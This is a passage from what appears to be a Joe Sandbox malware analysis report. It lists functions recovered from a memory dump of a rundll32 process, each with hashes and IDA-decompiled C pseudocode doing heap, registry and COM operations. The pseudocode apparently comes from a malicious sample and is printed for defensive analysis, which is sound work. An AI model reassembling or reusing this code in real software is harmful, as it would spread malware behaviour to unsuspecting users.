                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction ID: c336d0b37f184ae87539a0b227567b45b19bbe1d2718fa9fa5ae11d497173ea3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 674962a4bc9a27ac5fb9a572901c775df9df83adbc0775b1d76aed642f4fb702
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D2102BA600204BFD721EBA4DC05F9E37BAEB48706F1841A1F605E7190EB70AA008B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C33D0D, Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E04C33D0D(intOrPtr* _a4, void* _a8) {
				void _v31;
				char _v32;
				void* _t17;
				void* _t19;
				intOrPtr _t21;
				void* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t40;

				_t25 = 6;
				_v32 = 0;
				memset( &_v31, 0, _t25 << 2);
				_t26 = 0;
				asm("stosw");
				asm("stosb");
				_t31 = 0; // executed
				_t17 = E04C383B7( *0x4c3d258,  &_v32); // executed
				if(_t17 != 0 && _v31 > 2) {
					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
					_t26 = 0;
					if(_t23 > 0) {
						do {
							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
							_t26 = _t26 + 1;
						} while (_t26 < _t23);
					}
				}
				_t39 = _t31;
				 *0x4c3d270 = _t31;
				if(_t31 != 0) {
					L8:
					_t19 = E04C3924F( &_a8); // executed
					__eflags = _t19;
					if(_t19 == 0) {
						__eflags = _a8 - 0x1000;
						if(_a8 == 0x1000) {
							goto L10;
						}
					}
				} else {
					_t21 = E04C37923(_t26, _t39);
					_t40 =  *0x4c3d270; // 0xd448b889
					 *_a8 = _t21;
					if(_t40 != 0) {
						goto L8;
					} else {
						if(_t21 == 0) {
							L10:
							_push(5);
							_pop(0);
						} else {
							 *_a4 = 1;
							 *0x4c3d270 = _t21;
						}
					}
				}
				return 0;
			}














                                                                                                                                                                                                                                    0x04c33d18
                                                                                                                                                                                                                                    0x04c33d1d
                                                                                                                                                                                                                                    0x04c33d23
                                                                                                                                                                                                                                    0x04c33d23
                                                                                                                                                                                                                                    0x04c33d25
                                                                                                                                                                                                                                    0x04c33d27
                                                                                                                                                                                                                                    0x04c33d32
                                                                                                                                                                                                                                    0x04c33d34
                                                                                                                                                                                                                                    0x04c33d3b
                                                                                                                                                                                                                                    0x04c33d47
                                                                                                                                                                                                                                    0x04c33d4a
                                                                                                                                                                                                                                    0x04c33d4e
                                                                                                                                                                                                                                    0x04c33d50
                                                                                                                                                                                                                                    0x04c33d50
                                                                                                                                                                                                                                    0x04c33d54
                                                                                                                                                                                                                                    0x04c33d55
                                                                                                                                                                                                                                    0x04c33d50
                                                                                                                                                                                                                                    0x04c33d4e
                                                                                                                                                                                                                                    0x04c33d59
                                                                                                                                                                                                                                    0x04c33d5b
                                                                                                                                                                                                                                    0x04c33d61
                                                                                                                                                                                                                                    0x04c33d89
                                                                                                                                                                                                                                    0x04c33d8d
                                                                                                                                                                                                                                    0x04c33d92
                                                                                                                                                                                                                                    0x04c33d94
                                                                                                                                                                                                                                    0x04c33d96
                                                                                                                                                                                                                                    0x04c33d9d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33d9d
                                                                                                                                                                                                                                    0x04c33d63
                                                                                                                                                                                                                                    0x04c33d63
                                                                                                                                                                                                                                    0x04c33d68
                                                                                                                                                                                                                                    0x04c33d71
                                                                                                                                                                                                                                    0x04c33d73
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33d75
                                                                                                                                                                                                                                    0x04c33d77
                                                                                                                                                                                                                                    0x04c33d9f
                                                                                                                                                                                                                                    0x04c33d9f
                                                                                                                                                                                                                                    0x04c33da1
                                                                                                                                                                                                                                    0x04c33d79
                                                                                                                                                                                                                                    0x04c33d7c
                                                                                                                                                                                                                                    0x04c33d82
                                                                                                                                                                                                                                    0x04c33d82
                                                                                                                                                                                                                                    0x04c33d77
                                                                                                                                                                                                                                    0x04c33d73
                                                                                                                                                                                                                                    0x04c33da8

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction ID: 542057783b0805b6d614e895f79b7bf0ab19b67e791069de13ff00709d21084e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde90476db401c5555616e5daf5351ac06a98a9d295deae91bbe858792ac13fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B113A719102846EFF20DE75CC407BE7BA6EB44356F00453EDC12DA260D375F6858A10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C36A56, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C36A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v24;
				signed int _v28;
				void* _t11;
				unsigned int* _t12;
				signed int _t14;
				void* _t16;
				signed int _t17;
				unsigned int _t21;
				signed int _t24;
				void* _t25;
				void* _t28;
				signed int _t31;

				_t24 = __edx;
				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
				 *0x4c3d238 = __eax;
				if(__eax != 0) {
					__imp__();
					E04C3D1A8 = __eax;
					_t11 = E04C38F10(__eax, _a4);
					if(_t11 == 0) {
						do {
							_t12 =  &_v24;
							__imp__(_t12);
							__imp__();
							_t21 = _v24;
							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
							L04C3B226();
							_t31 = _t12 + _t14;
							_t16 = E04C37E03(_a4, _t31);
							_t17 = 2;
							_t23 = _t31;
							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
						} while (_t16 == 1);
						if(E04C36B96(_t23) != 0) {
							 *0x4c3d260 = 1; // executed
						}
						_t11 = E04C3225B(_t24); // executed
					}
				} else {
					_t11 = 8;
				}
				return _t11;
			}















                                                                                                                                                                                                                                    0x04c36a56
                                                                                                                                                                                                                                    0x04c36a69
                                                                                                                                                                                                                                    0x04c36a71
                                                                                                                                                                                                                                    0x04c36a76
                                                                                                                                                                                                                                    0x04c36a7d
                                                                                                                                                                                                                                    0x04c36a86
                                                                                                                                                                                                                                    0x04c36a8b
                                                                                                                                                                                                                                    0x04c36a92
                                                                                                                                                                                                                                    0x04c36a94
                                                                                                                                                                                                                                    0x04c36a94
                                                                                                                                                                                                                                    0x04c36a99
                                                                                                                                                                                                                                    0x04c36a9f
                                                                                                                                                                                                                                    0x04c36aa5
                                                                                                                                                                                                                                    0x04c36aaf
                                                                                                                                                                                                                                    0x04c36abc
                                                                                                                                                                                                                                    0x04c36ac1
                                                                                                                                                                                                                                    0x04c36ac7
                                                                                                                                                                                                                                    0x04c36ad0
                                                                                                                                                                                                                                    0x04c36ad1
                                                                                                                                                                                                                                    0x04c36ad6
                                                                                                                                                                                                                                    0x04c36adc
                                                                                                                                                                                                                                    0x04c36ae8
                                                                                                                                                                                                                                    0x04c36aea
                                                                                                                                                                                                                                    0x04c36aea
                                                                                                                                                                                                                                    0x04c36af4
                                                                                                                                                                                                                                    0x04c36af4
                                                                                                                                                                                                                                    0x04c36a78
                                                                                                                                                                                                                                    0x04c36a7a
                                                                                                                                                                                                                                    0x04c36a7a
                                                                                                                                                                                                                                    0x04c36afe

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction ID: 70cff846a8bd7322c2640c44b9291a76a2c4aa405ce591572fb0aca5f6602791
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c7d233ebccfd749b6355849ef92635cccb72a4c7db8f155d002f7de49a2142e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7411C2777042007FE720ABA4DC09B6E76DAEB44352F104528F906D6180EBB4FD1096A1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C394A9, Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction ID: 6df16119e649ebe6719572b64460d35293f9521e872c9a2d5d9a5269c8e3ff52
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aacf028395e99761749461118a9eaaadb6f09fcddacb56a30a20ed249b6159eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B601B5B66053116FD3309E6A8C49F3B7F99EB86662F120518F881D7240DBB4DC0196A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C321CD, Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E04C321CD(void* __ecx, signed char* _a4) {
				char _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				signed short* _t21;
				void* _t23;
				intOrPtr* _t26;

				_t23 = 0;
				_push(0);
				_t18 = 1;
				_t26 = 0x4c3d330;
				E04C384D5();
				while(1) {
					_t8 = E04C312D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E04C3809F(_t14);
					if(_t15 == 0) {
						__imp__( *0x4c3d238, 0, _v8);
						break;
					} else {
						 *_t26 = _t15;
						_t26 = _t26 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E04C384D5();
					if(_t18 != 0) {
						_t21 =  *0x4c3d338; // 0x6c69b70
						_t11 =  *_t21 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t21 = _t12;
					}
					return _t18;
				}
				_t18 = 0;
				goto L7;
			}













                                                                                                                                                                                                                                    0x04c321d5
                                                                                                                                                                                                                                    0x04c321d9
                                                                                                                                                                                                                                    0x04c321da
                                                                                                                                                                                                                                    0x04c321db
                                                                                                                                                                                                                                    0x04c321e0
                                                                                                                                                                                                                                    0x04c321e5
                                                                                                                                                                                                                                    0x04c321ec
                                                                                                                                                                                                                                    0x04c321f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c321f5
                                                                                                                                                                                                                                    0x04c321fa
                                                                                                                                                                                                                                    0x04c321fb
                                                                                                                                                                                                                                    0x04c32202
                                                                                                                                                                                                                                    0x04c3221c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32204
                                                                                                                                                                                                                                    0x04c32204
                                                                                                                                                                                                                                    0x04c32206
                                                                                                                                                                                                                                    0x04c32209
                                                                                                                                                                                                                                    0x04c3220d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3220f
                                                                                                                                                                                                                                    0x04c3220d
                                                                                                                                                                                                                                    0x04c32224
                                                                                                                                                                                                                                    0x04c32224
                                                                                                                                                                                                                                    0x04c32226
                                                                                                                                                                                                                                    0x04c3222d
                                                                                                                                                                                                                                    0x04c3222f
                                                                                                                                                                                                                                    0x04c32235
                                                                                                                                                                                                                                    0x04c3223c
                                                                                                                                                                                                                                    0x04c3224c
                                                                                                                                                                                                                                    0x04c32244
                                                                                                                                                                                                                                    0x04c32247
                                                                                                                                                                                                                                    0x04c32247
                                                                                                                                                                                                                                    0x04c3224f
                                                                                                                                                                                                                                    0x04c3224f
                                                                                                                                                                                                                                    0x04c32258
                                                                                                                                                                                                                                    0x04c32258
                                                                                                                                                                                                                                    0x04c32222
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction ID: 1d3c06a4cde04579819f8a46efa171535485e62e31e0cb86891a5373c16356d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fa85261eca86865f0f44b96b26a4b694a5b568eb9b862701ac6ccc8214b2361
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501B576200204AAFB00EFE6DC80BBA76ABEB45376F540475B945D6050D67ABD41A660
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C3A72D, Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3A72D(intOrPtr _a4, intOrPtr* _a8) {
				void* _t9;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr* _t17;
				intOrPtr* _t19;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t28;

				_t28 = E04C32049(_t9, 8);
				if(_t28 == 0) {
					_t11 = 8;
					return _t11;
				}
				_t12 =  *0x4c3d27c; // 0x202a5a8
				_t2 = _t12 + 0x4c3e1bc; // 0x6f0072
				_t14 = E04C37B5D(_t2, _a4, _t28); // executed
				_t27 = _t14;
				if(_t27 < 0) {
					L6:
					E04C39039(_t14, _t28);
					return _t27;
				}
				_t17 =  *_t28;
				_t3 = _t28 + 4; // 0x4
				_t25 =  *0x4c3d27c; // 0x202a5a8
				_t4 = _t25 + 0x4c3e1fc; // 0x740053
				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
				if(_t27 < 0) {
					_t19 =  *_t28;
					 *((intOrPtr*)( *_t19 + 8))(_t19);
					_t14 = _a4;
				} else {
					_t14 = 0;
					 *_a8 = _t28;
				}
				if(_t27 < 0) {
					goto L6;
				}
				return _t14;
			}












                                                                                                                                                                                                                                    0x04c3a739
                                                                                                                                                                                                                                    0x04c3a73d
                                                                                                                                                                                                                                    0x04c3a7a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3a7a3
                                                                                                                                                                                                                                    0x04c3a73f
                                                                                                                                                                                                                                    0x04c3a748
                                                                                                                                                                                                                                    0x04c3a74f
                                                                                                                                                                                                                                    0x04c3a754
                                                                                                                                                                                                                                    0x04c3a758
                                                                                                                                                                                                                                    0x04c3a797
                                                                                                                                                                                                                                    0x04c3a798
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3a79d
                                                                                                                                                                                                                                    0x04c3a75a
                                                                                                                                                                                                                                    0x04c3a760
                                                                                                                                                                                                                                    0x04c3a764
                                                                                                                                                                                                                                    0x04c3a76e
                                                                                                                                                                                                                                    0x04c3a779
                                                                                                                                                                                                                                    0x04c3a77d
                                                                                                                                                                                                                                    0x04c3a788
                                                                                                                                                                                                                                    0x04c3a78d
                                                                                                                                                                                                                                    0x04c3a790
                                                                                                                                                                                                                                    0x04c3a77f
                                                                                                                                                                                                                                    0x04c3a782
                                                                                                                                                                                                                                    0x04c3a784
                                                                                                                                                                                                                                    0x04c3a784
                                                                                                                                                                                                                                    0x04c3a795
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3a7a7

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3264021b966b64a987efe5c265611a528fa56f7a1cd22b5f0d963550374fbad5
                                                                                                                                                                                                                                    • Instruction ID: 3da817bd419a41e300841efdc0ddb340e172e7227a7911bece42d739b7163fdd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3264021b966b64a987efe5c265611a528fa56f7a1cd22b5f0d963550374fbad5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001C479200604ABD711DB69C880F5677BAEFCA756F108418B548CF240DA72EC01DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C39318, Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E04C39318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4c3d27c; // 0x202a5a8
				_t4 = _t15 + 0x4c3e39c; // 0x6c68944
				_t20 = _t4;
				_t6 = _t15 + 0x4c3e124; // 0x650047
				_t17 = E04C39152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E04C39FC9(_t17, _t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                    0x04c39322
                                                                                                                                                                                                                                    0x04c39324
                                                                                                                                                                                                                                    0x04c3932b
                                                                                                                                                                                                                                    0x04c3932c
                                                                                                                                                                                                                                    0x04c3932d
                                                                                                                                                                                                                                    0x04c3932e
                                                                                                                                                                                                                                    0x04c39334
                                                                                                                                                                                                                                    0x04c39339
                                                                                                                                                                                                                                    0x04c39339
                                                                                                                                                                                                                                    0x04c39343
                                                                                                                                                                                                                                    0x04c39355
                                                                                                                                                                                                                                    0x04c3935c
                                                                                                                                                                                                                                    0x04c3938b
                                                                                                                                                                                                                                    0x04c3935e
                                                                                                                                                                                                                                    0x04c39363
                                                                                                                                                                                                                                    0x04c39388
                                                                                                                                                                                                                                    0x04c39365
                                                                                                                                                                                                                                    0x04c39368
                                                                                                                                                                                                                                    0x04c3936f
                                                                                                                                                                                                                                    0x04c3937a
                                                                                                                                                                                                                                    0x04c39371
                                                                                                                                                                                                                                    0x04c39374
                                                                                                                                                                                                                                    0x04c39374
                                                                                                                                                                                                                                    0x04c3937e
                                                                                                                                                                                                                                    0x04c3937e
                                                                                                                                                                                                                                    0x04c39363
                                                                                                                                                                                                                                    0x04c39392

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6c0702a08201dfc5adfeac0b53abf58eac175d4cb3ece1e7fae7184504bfd717
                                                                                                                                                                                                                                    • Instruction ID: f02f383c46fbd209967a8477116a149af61e2f6e2828978713b2e31af3f2585f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c0702a08201dfc5adfeac0b53abf58eac175d4cb3ece1e7fae7184504bfd717
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7901B1B2504019BFDF50AFA8CC449AEBBBAFB48741F004825F911E20B0E3B0ED5497D1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C389D6, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 41%
                                                                                                                                                                                                                                    			E04C389D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				char _v12;
				void* _t15;
				void* _t20;
				void* _t23;
				signed short* _t24;

				_t23 = E04C3809F(0, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E04C3904E(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						__imp__( &_v12);
						_push( &_v12);
						 *_t24 = 0x5f;
						_t20 = E04C3A635(__edx, 8, _a4, 0x80000001, _a8, _t23);
					}
					__imp__( *0x4c3d238, 0, _t23);
				}
				return _t20;
			}








                                                                                                                                                                                                                                    0x04c389e9
                                                                                                                                                                                                                                    0x04c389ed
                                                                                                                                                                                                                                    0x04c38a47
                                                                                                                                                                                                                                    0x04c389ef
                                                                                                                                                                                                                                    0x04c389f6
                                                                                                                                                                                                                                    0x04c389fc
                                                                                                                                                                                                                                    0x04c38a00
                                                                                                                                                                                                                                    0x04c38a05
                                                                                                                                                                                                                                    0x04c38a09
                                                                                                                                                                                                                                    0x04c38a0f
                                                                                                                                                                                                                                    0x04c38a18
                                                                                                                                                                                                                                    0x04c38a1d
                                                                                                                                                                                                                                    0x04c38a32
                                                                                                                                                                                                                                    0x04c38a32
                                                                                                                                                                                                                                    0x04c38a3d
                                                                                                                                                                                                                                    0x04c38a3d
                                                                                                                                                                                                                                    0x04c38a4e

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5d7fae165b6b0adbe2f3ce27130d252ec3531c1eff55408526b43cc5ceb4a8b9
                                                                                                                                                                                                                                    • Instruction ID: 9fafc8439d229939063a0de7711171885ae4dcd76c1b6a62937cd933363ad593
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d7fae165b6b0adbe2f3ce27130d252ec3531c1eff55408526b43cc5ceb4a8b9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1018F36200209BBEF216FA4DC44F9A7BBAFF84309F004425FA009A150EBB6E9649760
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C31262, Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 58%
